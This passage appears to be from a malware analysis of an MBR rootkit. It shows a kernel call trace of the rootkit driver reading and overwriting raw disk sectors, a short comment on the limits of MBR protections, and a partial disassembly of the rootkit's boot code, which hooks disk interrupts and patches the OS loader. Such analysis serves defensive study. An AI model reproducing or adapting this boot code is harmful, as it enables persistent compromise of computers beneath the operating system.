nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E400 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E600 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E800 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B66 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD29E0 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A0E 3.tmp: nt!IoBuildDeviceIoControlRequest {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A1C 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_DEVICE_CONTROL ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BB5 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_DEVICE_CONTROL \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000000000000000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9EA00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000cs:7FB90000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A5D298 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9EC00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000cs:7FB90200 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9EE00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A5D298 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000cs:7FB90400 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) ... ... ... {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBDB600 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FBE3400 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBDB800 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FBE3600 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBDBA00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) ... ... ... {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBE3800 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBE3A00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7800 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7A00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7C00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x818D9000, 232448, 0000cs:7FB90000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7800 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7A00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7C00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000000000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
When we are thinking, how to ensure protection against this threat, we should remember, that BIOS MBR protections and all software based solutions could failed, when the attacker will move malicious code from the MBR to the partition boot record. The partition boot record has the same potential like MBR and also could be used to compromise the OS.
Hopefully, new technologies like TPM will help improve the security.
The author of the rootkit released another improved version of the malware. The rootkit gang decided to continue "mouse and cat game", and to be more effective against AV scanners and removal tools, the changes concerning the MBR sector code, as well as now malware uses few tricks to cheat removal tools .
old rootkit MBR code |
new rootkit MBR code |
cs:7c00 (01) fa CLI cs:7c01 (02) 33db XOR BX, BX cs:7c03 (02) 8ed3 MOV SS, BX cs:7c05 (05) 36 8926 fe7b MOV SS:[0x7bfe], SP cs:7c0a (03) bc fe7b MOV SP, 0x7bfe cs:7c0d (01) 1e PUSH DS cs:7c0e (02) 66 60 PUSHAD cs:7c10 (01) fc CLD cs:7c11 (02) 8edb MOV DS, BX cs:7c13 (03) be 1304 MOV SI, 0x413 cs:7c16 (03) 832c 02 SUB WORD [SI], 0x2 cs:7c19 (01) ad LODSW cs:7c1a (03) c1e0 06 SHL AX, 0x6 cs:7c1d (02) 8ec0 MOV ES, AX cs:7c1f (03) be 007c MOV SI, 0x7c00 cs:7c22 (02) 33ff XOR DI, DI cs:7c24 (03) b9 0001 MOV CX, 0x100 cs:7c27 (02) f3 a5 REP MOVSW cs:7c29 (03) b8 0202 MOV AX, 0x202 cs:7c2c (02) b1 3d MOV CL, 0x3d cs:7c2e (03) ba 8000 MOV DX, 0x80 cs:7c31 (02) 8bdf MOV BX, DI cs:7c33 (02) cd 13 INT 0x13 cs:7c35 (02) 33db XOR BX, BX cs:7c37 (04) 66 8b47 4c MOV EAX, [BX+0x4c] cs:7c3b (05) 66 26 a3 7300 MOV ES:[0x73], EAX cs:7c40 (05) c747 4c 6600 MOV WORD [BX+0x4c], 0x66 cs:7c45 (03) 8c47 4e MOV WORD [BX+0x4e], ES cs:7c48 (01) 06 PUSH ES cs:7c49 (03) 68 4d00 PUSH 0x4d cs:7c4c (01) cb RETF cs:7c4d (01) fb STI cs:7c4e (02) 8ec3 MOV ES, BX cs:7c50 (03) b8 0102 MOV AX, 0x201 cs:7c53 (03) b9 3f00 MOV CX, 0x3f cs:7c56 (03) ba 8000 MOV DX, 0x80 cs:7c59 (02) b7 7c MOV BH, 0x7c cs:7c5b (02) cd 13 INT 0x13 cs:7c5d (02) 66 61 POPAD cs:7c5f (01) 1f POP DS cs:7c60 (01) 5c POP SP cs:7c61 (05) ea 007c 0000 JMP FAR 0x0:0x7c00 cs:7c66 (01) 9c PUSHF cs:7c67 (03) 80fc 42 CMP AH, 0x42 cs:7c6a (02) 74 0b JZ 0x7c77 cs:7c6c (03) 80fc 02 CMP AH, 0x2 cs:7c6f (02) 74 06 JZ 0x7c77 cs:7c71 (01) 9d POPF cs:7c72 (05) ea 0000 0000 JMP FAR 0x0:0x0 cs:7c77 (05) 2e 8826 9000 MOV CS:[0x90], AH cs:7c7c (01) 9d POPF cs:7c7d (01) 9c PUSHF cs:7c7e (05) 2e ff1e 7300 CALL FAR WORD CS:[0x73] cs:7c83 (04) 0f82 9d00 JB 0x7d24 cs:7c87 (01) 9c PUSHF cs:7c88 (01) fa CLI cs:7c89 (01) 06 PUSH ES cs:7c8a (02) 66 60 PUSHAD cs:7c8c (01) fc CLD cs:7c8d (02) b4 00 MOV AH, 0x0 cs:7c8f (02) b5 00 MOV CH, 0x0 cs:7c91 (03) 80fd 42 CMP CH, 0x42 cs:7c94 (02) 75 04 JNZ 0x7c9a cs:7c96 (01) ad LODSW cs:7c97 (01) ad LODSW cs:7c98 (02) c41c LES BX, WORD [SI] cs:7c9a (02) 85c0 TEST AX, AX cs:7c9c (02) 75 01 JNZ 0x7c9f cs:7c9e (01) 40 INC AX cs:7c9f (02) 8bc8 MOV CX, AX cs:7ca1 (02) b0 8b MOV AL, 0x8b cs:7ca3 (03) c1e1 09 SHL CX, 0x9 cs:7ca6 (02) 8bfb MOV DI, BX cs:7ca8 (01) 60 PUSHA cs:7ca9 (02) f2 ae REPNZ SCASB cs:7cab (02) 75 47 JNZ 0x7cf4 cs:7cad (08) 66 26 813d f085f674 CMP DWORD ES:[DI], 0x74f685f0 cs:7cb5 (02) 75 f2 JNZ 0x7ca9 cs:7cb7 (06) 26 817d 05 803d CMP WORD ES:[DI+0x5], 0x3d80 cs:7cbd (02) 75 ea JNZ 0x7ca9 cs:7cbf (04) 26 8a45 04 MOV AL, ES:[DI+0x4] cs:7cc3 (02) 3c 21 CMP AL, 0x21 cs:7cc5 (02) 74 04 JZ 0x7ccb cs:7cc7 (02) 3c 22 CMP AL, 0x22 cs:7cc9 (02) 75 de JNZ 0x7ca9 cs:7ccb (03) be 0b02 MOV SI, 0x20b cs:7cce (04) 2e 803c 00 CMP BYTE CS:[SI], 0x0 cs:7cd2 (02) 75 20 JNZ 0x7cf4 cs:7cd4 (03) 2e 8804 MOV CS:[SI], AL cs:7cd7 (06) 26 c745 ff ff15 MOV WORD ES:[DI-0x1], 0x15ff cs:7cdd (03) 66 8cc8 MOV EAX, CS cs:7ce0 (04) 66 c1e0 04 SHL EAX, 0x4 cs:7ce4 (03) 05 0002 ADD AX, 0x200 cs:7ce7 (05) 66 2e a3 fc01 MOV CS:[0x1fc], EAX cs:7cec (03) 2d 0400 SUB AX, 0x4 cs:7cef (05) 66 26 8945 01 MOV ES:[DI+0x1], EAX cs:7cf4 